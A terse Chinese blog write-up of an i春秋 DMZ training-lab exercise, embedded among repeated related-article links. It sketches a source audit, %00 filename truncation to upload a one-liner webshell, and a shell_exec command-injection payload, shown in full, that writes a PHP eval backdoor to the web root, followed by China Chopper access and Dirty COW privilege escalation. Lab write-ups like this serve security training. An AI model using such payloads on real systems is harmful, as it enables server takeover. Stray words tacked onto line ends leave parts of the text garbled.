i春秋DMZ大型靶场实验(三)内网转发DMZ2
更具实验文件知道存在源码泄露 下载源码进行源码审计php
发现admin帐号html
查看user.php 发现mysql 帐号 端口mysql
对登陆后源码进行审计 发现上传文件的两处漏洞sql
对 fiel name 能够 %00 截断 上传一句话木马 对file name shell_exec 未对参数过滤 能够拼接执行 命令 写一句话 例如 shell
'|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||'htm
菜刀链接blog
上传脏牛提权源码
相关文章
- 1. i春秋DMZ大型靶场实验(一)内网拓展
- 2. i春秋DMZ大型靶场实验(四)Hash基础
- 3. i春秋DMZ大型靶场实验(二)提权漏洞
- 4. i春秋Backdoor
- 5. i春秋----Misc
- 6. i春秋Hash
- 7. i春秋broken
- 8. i春秋 upload
- 9. i春秋Blog
- 10. i春秋Fuzz
- 更多相关文章...
- • Web 网页 验证 - 网站建设指南
- • C# 类型转换 - C#教程
- • JDK13 GA发布:5大特性解读
- • Spring Cloud 微服务实战(三) - 服务注册与发现
相关标签/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
欢迎关注本站公众号,获取更多信息
相关文章
- 1. i春秋DMZ大型靶场实验(一)内网拓展
- 2. i春秋DMZ大型靶场实验(四)Hash基础
- 3. i春秋DMZ大型靶场实验(二)提权漏洞
- 4. i春秋Backdoor
- 5. i春秋----Misc
- 6. i春秋Hash
- 7. i春秋broken
- 8. i春秋 upload
- 9. i春秋Blog
- 10. i春秋Fuzz